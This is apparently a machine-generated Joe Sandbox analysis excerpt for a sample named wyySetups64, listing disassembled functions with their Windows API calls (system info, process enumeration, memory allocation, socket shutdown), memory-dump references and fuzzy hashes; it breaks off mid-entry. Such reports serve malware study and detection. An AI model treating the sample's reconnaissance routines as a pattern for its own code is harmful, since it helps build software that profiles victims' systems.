                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03377523), ref: 0337743D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03377444
                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03377523), ref: 03377452
                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03377523), ref: 0337745A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                                                                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                              • API String ID: 3433367815-192647395
                                                                                                                                                                                                              • Opcode ID: 38fc90cde7c4b3d8dc46a67fd8c6dbe680d0e7df171acb8db158fc26a00115b3
                                                                                                                                                                                                              • Instruction ID: 0ccbc27dd8e2e58fdc8cf9091cc2cdd48464bca267ef19b199546b9387332506
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38fc90cde7c4b3d8dc46a67fd8c6dbe680d0e7df171acb8db158fc26a00115b3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04012C70D00209AFDF60DFB499846FEBBF9EB08300F5445AAD559E3240E63A8A50CBA1
                                                                                                                                                                                                              Function 00BD71B6 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00BD71BC
                                                                                                                                                                                                                • Part of subcall function 00BD9754: TlsGetValue.KERNEL32(00000000,00BD98AD,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000,00000000), ref: 00BD975D
                                                                                                                                                                                                                • Part of subcall function 00BD9754: DecodePointer.KERNEL32(?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000,00000000,?,00BD99BA,0000000D), ref: 00BD976F
                                                                                                                                                                                                                • Part of subcall function 00BD9754: TlsSetValue.KERNEL32(00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000,00000000,?,00BD99BA), ref: 00BD977E
                                                                                                                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 00BD71C7
                                                                                                                                                                                                                • Part of subcall function 00BD9734: TlsGetValue.KERNEL32(?,?,00BD71CC,00000000), ref: 00BD9742
                                                                                                                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 00BD71DA
                                                                                                                                                                                                                • Part of subcall function 00BD9788: DecodePointer.KERNEL32(?,?,?,00BD71DF,00000000,?,00000000), ref: 00BD9799
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00BD71E3
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00BD71EA
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BD71F0
                                                                                                                                                                                                              • __freefls@4.LIBCMT ref: 00BD7210
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2383549826-0
                                                                                                                                                                                                              • Opcode ID: 55757018adbb51d8363c8564fd5dd641374c250f0aeb25f7231cb68537a3411b
                                                                                                                                                                                                              • Instruction ID: 34d63f46497564e605a4afa917c63793c667c52f3582c45b811becc7621cf77a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55757018adbb51d8363c8564fd5dd641374c250f0aeb25f7231cb68537a3411b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DF09675504645ABC714BF71C94988EFBE9AF4431471085DAF9049B313FF34DC428790
                                                                                                                                                                                                              Function 0337F9C4 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 0337F9CA
                                                                                                                                                                                                                • Part of subcall function 03383CA0: TlsGetValue.KERNEL32(00000000,03383DF9,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76,00000000,00000000), ref: 03383CA9
                                                                                                                                                                                                                • Part of subcall function 03383CA0: DecodePointer.KERNEL32(?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76,00000000,00000000,?,03383F06,0000000D), ref: 03383CBB
                                                                                                                                                                                                                • Part of subcall function 03383CA0: TlsSetValue.KERNEL32(00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76,00000000,00000000,?,03383F06), ref: 03383CCA
                                                                                                                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 0337F9D5
                                                                                                                                                                                                                • Part of subcall function 03383C80: TlsGetValue.KERNEL32(?,?,0337F9DA,00000000), ref: 03383C8E
                                                                                                                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 0337F9E8
                                                                                                                                                                                                                • Part of subcall function 03383CD4: DecodePointer.KERNEL32(?,?,?,0337F9ED,00000000,?,00000000), ref: 03383CE5
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 0337F9F1
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 0337F9F8
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0337F9FE
                                                                                                                                                                                                              • __freefls@4.LIBCMT ref: 0337FA1E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2383549826-0
                                                                                                                                                                                                              • Opcode ID: dbe9f57b44814a8a9a10d0e9cccc4158639017970fc91b205d317af88606f32b
                                                                                                                                                                                                              • Instruction ID: 1fbe747045e7b6e5f73480055629470e12b370b4aba16c85cd3c8dac5f1e86eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbe9f57b44814a8a9a10d0e9cccc4158639017970fc91b205d317af88606f32b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFF06D7CA00708BBC718FF70C9C880E7BBCBF896507218458E9098F311DA39D442CBA1
                                                                                                                                                                                                              Function 03376050 Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337607C
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03376088
                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,00000000), ref: 033760B9
                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0337610F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 03376116
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2526126748-0
                                                                                                                                                                                                              • Opcode ID: 73a77b38d663315ee2e38565d1c8ef4f334b0077454e91676d7cb3d6e463910d
                                                                                                                                                                                                              • Instruction ID: 7c2189740e195be21ac2988f8cd03b5fb2675c0e85393527883d58c83627630e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73a77b38d663315ee2e38565d1c8ef4f334b0077454e91676d7cb3d6e463910d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B21B731A05518EBDB30EF64DCEABEAB36DEF14310F044699DD0A97281EB3A9A14C650
                                                                                                                                                                                                              Function 00BD32E0 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BD32F1
                                                                                                                                                                                                              • Sleep.KERNEL32(00000258), ref: 00BD32FE
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00BD3306
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BD3312
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BD331A
                                                                                                                                                                                                              • Sleep.KERNEL32(0000012C), ref: 00BD332B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3137405945-0
                                                                                                                                                                                                              • Opcode ID: eeaf42913bc0361ad0ff03f47fde89b3ee150f09ffa530784b02bea49ed491fa
                                                                                                                                                                                                              • Instruction ID: 204b7b26cbd746a4e0927def32958b08ff523a86b51ca62824c25487ef2bf225
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eeaf42913bc0361ad0ff03f47fde89b3ee150f09ffa530784b02bea49ed491fa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73F08272204704ABD620ABA9DCC4E46F3A8AF85335B204709F221872E1CEB0E8018BA4
                                                                                                                                                                                                              Function 03376690 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110comCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0337669B
                                                                                                                                                                                                              • CoCreateInstance.OLE32(033946FC,00000000,00000001,0339471C,?,?,?,?,?,?,?,?,?,?,0337588A), ref: 033766B2
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0337674C
                                                                                                                                                                                                              • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,0337588A), ref: 0337677D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                                                                                                                                                              • String ID: FriendlyName
                                                                                                                                                                                                              • API String ID: 841178590-3623505368
                                                                                                                                                                                                              • Opcode ID: 4c82ff938879c994aefc5f230fb8cd5c7d45b488763c1cb8060677a2225bddad
                                                                                                                                                                                                              • Instruction ID: 4739705154b5d737cf07e3d7ad0976ffba3a7f174db508345e23ce4875d4a688
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c82ff938879c994aefc5f230fb8cd5c7d45b488763c1cb8060677a2225bddad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE31577560060AAFDB10DB99CCD1EAEB7BDEF88700F148589F514EB250DA71E942CB60
                                                                                                                                                                                                              Function 0337F707 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                                • Part of subcall function 0337F673: __FF_MSGBANNER.LIBCMT ref: 0337F68C
                                                                                                                                                                                                                • Part of subcall function 0337F673: __NMSG_WRITE.LIBCMT ref: 0337F693
                                                                                                                                                                                                                • Part of subcall function 0337F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76), ref: 0337F6B8
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 0337F756
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 0337F770
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0337F781
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                                                              • String ID: bad allocation
                                                                                                                                                                                                              • API String ID: 615853336-2104205924
                                                                                                                                                                                                              • Opcode ID: 1f4cef061555a91cd5546fb69f66c9b3b4fffbe13c961bf5469ea2f6d0f127fa
                                                                                                                                                                                                              • Instruction ID: e5fc3caa25cb3dab6db70c8951e20374a65615e6da84de85dd74b72bfcf2845d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f4cef061555a91cd5546fb69f66c9b3b4fffbe13c961bf5469ea2f6d0f127fa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BDF02879D00309EFEF20FF54DCE5A9E7BECBB40254F14011AE414EA191DB75CA058B90
                                                                                                                                                                                                              Function 00BD2D10 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00BD2D3C
                                                                                                                                                                                                              • CancelIo.KERNEL32(?), ref: 00BD2D46
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000000,00000000), ref: 00BD2D4F
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 00BD2D59
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000001), ref: 00BD2D63
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1486965892-0
                                                                                                                                                                                                              • Opcode ID: 5239f155688ac95166355b8d3b11e07adf28dfb8aa03b20f2864228f32d94bca
                                                                                                                                                                                                              • Instruction ID: 715b85f5663435fa2e9f6cce960bb5b90375052262d0278f19394a8094c54773
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5239f155688ac95166355b8d3b11e07adf28dfb8aa03b20f2864228f32d94bca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11F04F76100B00ABD330DF54DC89F5A77B8FB49B15F104A5DF6829B790CBB0B9048BA0
                                                                                                                                                                                                              Function 00BD6F17 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00BD6F31
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: __FF_MSGBANNER.LIBCMT ref: 00BD6E9C
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: __NMSG_WRITE.LIBCMT ref: 00BD6EA3
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F), ref: 00BD6EC8
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00BD6F66
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00BD6F80
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00BD6F91
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 615853336-0
                                                                                                                                                                                                              • Opcode ID: b8b28fea3ade988e686bbaf7fa2e2b8753e39d83876af7b89857c661073e4801
                                                                                                                                                                                                              • Instruction ID: cc721ea783678068fe2451877ca150b860898cb3f678b5ac424622dd9019963b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8b28fea3ade988e686bbaf7fa2e2b8753e39d83876af7b89857c661073e4801
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BF0F431500649ABDB04EBA5EC42A9DBBEA9B44714F1401EAF401DA291FFB1AA408745
                                                                                                                                                                                                              Function 03373160 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0337316B
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 03373183
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0337322F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentThread$ExchangeInterlocked
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4033114805-0
                                                                                                                                                                                                              • Opcode ID: c70cf53fc5ad0eab98e3e898b86121ec3b9e673569fb2baef05f45dd39b9158f
                                                                                                                                                                                                              • Instruction ID: bc5cef6a5e023a8292a59d1ccf9533e58992da6911f4b667935e0936ae3946a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c70cf53fc5ad0eab98e3e898b86121ec3b9e673569fb2baef05f45dd39b9158f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7318979600606EFC728EF69C8C4A6AB3E8FF44724B10C56DE81ACB615D739F841DB90
                                                                                                                                                                                                              Function 00BD11B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __floor_pentium4.LIBCMT ref: 00BD11E9
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00BD1226
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BD1255
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2605973128-0
                                                                                                                                                                                                              • Opcode ID: a2a20f6508b6028393b386bb661ab5ec3e8dfefa096cf8040c0c949bb51401e5
                                                                                                                                                                                                              • Instruction ID: 4091cfa49f6b2af49ac5fb2883ea242c9fdf6614d52e4191165f21fa51405935
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2a20f6508b6028393b386bb661ab5ec3e8dfefa096cf8040c0c949bb51401e5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0221D730A00705AFDB149FADEC85B6EF7F5EF40705F0089AEE949E3740EA71A8008754
                                                                                                                                                                                                              Function 033711B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __floor_pentium4.LIBCMT ref: 033711E9
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03371226
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03371255
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2605973128-0
                                                                                                                                                                                                              • Opcode ID: 59991d8be826ed6ec2dbc423e219cd080bb43f21161c7f24ce726bb4b73c6383
                                                                                                                                                                                                              • Instruction ID: 092d822cc3d07992880c801457c24776d21c9554d1906918a5f14730fb542678
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59991d8be826ed6ec2dbc423e219cd080bb43f21161c7f24ce726bb4b73c6383
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B121A171E00709AFDB20DFAED885B6FFBF8EF44705F0085ADE859E6640E635A8508740
                                                                                                                                                                                                              Function 00BD1100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __floor_pentium4.LIBCMT ref: 00BD112F
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00BD115F
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BD1192
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2605973128-0
                                                                                                                                                                                                              • Opcode ID: 79ee2336c6828d91deda865a94637bcf5566ef17ad546e919a47159159bfe56a
                                                                                                                                                                                                              • Instruction ID: abb626a9eb8073e2d67310bf245daa847c2d2b275417ce4af5a452705529974e
